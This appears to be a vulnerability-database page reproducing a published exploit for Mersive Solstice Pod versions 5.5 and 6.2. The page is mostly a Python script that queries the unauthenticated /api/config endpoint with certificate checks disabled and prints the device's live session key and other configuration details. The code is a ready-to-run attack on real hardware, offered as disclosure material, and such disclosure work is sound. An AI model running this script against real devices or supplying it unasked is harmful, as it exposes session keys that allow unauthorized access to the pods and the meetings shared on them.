Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Solstice Pod 5.5 / 6.2 Information Disclosure

🗓️ 31 Mar 2025 00:00:00Reported by The Baldwin School Ethical HackersType 
packetstorm
 packetstorm🔗 packetstorm.news👁 188 Views

Exploit exposes sensitive data via unauthenticated API endpoint in Solstice Pod versions 5.5, 6.2.

Code
# Exploit Title: Solstice Pod API Session Key Extraction via API Endpoint
    # Google Dork: N/A
    # Date: 1/17/2025
    # Exploit Author: The Baldwin School Ethical Hackers
    # Vendor Homepage: https://www.mersive.com/
    # Software Link: https://documentation.mersive.com/en/solstice/about-solstice.html
    # Versions: 5.5, 6.2
    # Tested On: Windows 10, macOS, Linux 
    # CVE: N/A
    # Description: This exploit takes advantage of an unauthenticated API endpoint (`/api/config`) on the Solstice Pod, which exposes sensitive information such as the session key, server version, product details, and display name. By accessing this endpoint without authentication, attackers can extract live session information.
    # Notes: This script extracts the session key, server version, product name, product variant, and display name from the Solstice Pod API. It does not require authentication to interact with the vulnerable `/api/config` endpoint.
    # Impact: Unauthorized users can extract session-related information without authentication. The exposed data could potentially lead to further exploitation or unauthorized access.
    
    #!/usr/bin/env python3
    
    import requests
    import ssl
    from requests.adapters import HTTPAdapter
    from urllib3.poolmanager import PoolManager
    
    # Create an adapter to specify the SSL/TLS version and disable hostname verification
    class SSLAdapter(HTTPAdapter):
        def __init__(self, ssl_context=None, **kwargs):
            # Set the default context if none is provided
            if ssl_context is None:
                ssl_context = ssl.create_default_context()
                ssl_context.set_ciphers('TLSv1.2')  # Force TLSv1.2 (or adjust to other versions if needed)
                ssl_context.check_hostname = False  # Disable hostname checking
                ssl_context.verify_mode = ssl.CERT_NONE  # Disable certificate validation
            self.ssl_context = ssl_context
            super().__init__(**kwargs)
    
        def init_poolmanager(self, *args, **kwargs):
            kwargs['ssl_context'] = self.ssl_context
            return super().init_poolmanager(*args, **kwargs)
    
    # Prompt the user for the IP address
    ip_address = input("Please enter the IP address: ")
    
    # Format the URL with the provided IP address
    url = f"https://{ip_address}:8443/api/config"
    
    # Create a session and mount the adapter
    session = requests.Session()
    adapter = SSLAdapter()
    session.mount('https://', adapter)
    
    # Send the request to the IP address
    response = session.get(url, verify=False)  # verify=False to ignore certificate warnings
    
    if response.status_code == 200:
        # Parse the JSON response
        data = response.json()
    
        # Extract the sessionKey, serverVersion, productName, productVariant, and displayName values from the response
        session_key = data.get("m_authenticationCuration", {}).get("sessionKey")
        server_version = data.get("m_serverVersion")
        product_name = data.get("m_productName")
        product_variant = data.get("m_productVariant")
        display_name = data.get("m_displayInformation", {}).get("m_displayName")
    
        # Print the extracted values
        if session_key:
            print(f"Session Key: {session_key}")
        else:
            print("sessionKey not found in the response.")
    
        if server_version:
            print(f"Server Version: {server_version}")
        else:
            print("serverVersion not found in the response.")
    
        if product_name:
            print(f"Product Name: {product_name}")
        else:
            print("productName not found in the response.")
    
        if product_variant:
            print(f"Product Variant: {product_variant}")
        else:
            print("productVariant not found in the response.")
    
        if display_name:
            print(f"Display Name: {display_name}")
        else:
            print("displayName not found in the response.")
    else:
        print(f"Failed to retrieve data. HTTP Status code: {response.status_code}")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Mar 2025 00:00Current
7.1High risk
Vulners AI Score7.1
unauthenticated apisession key extractionsensitive informationsolstice poddata exposure
188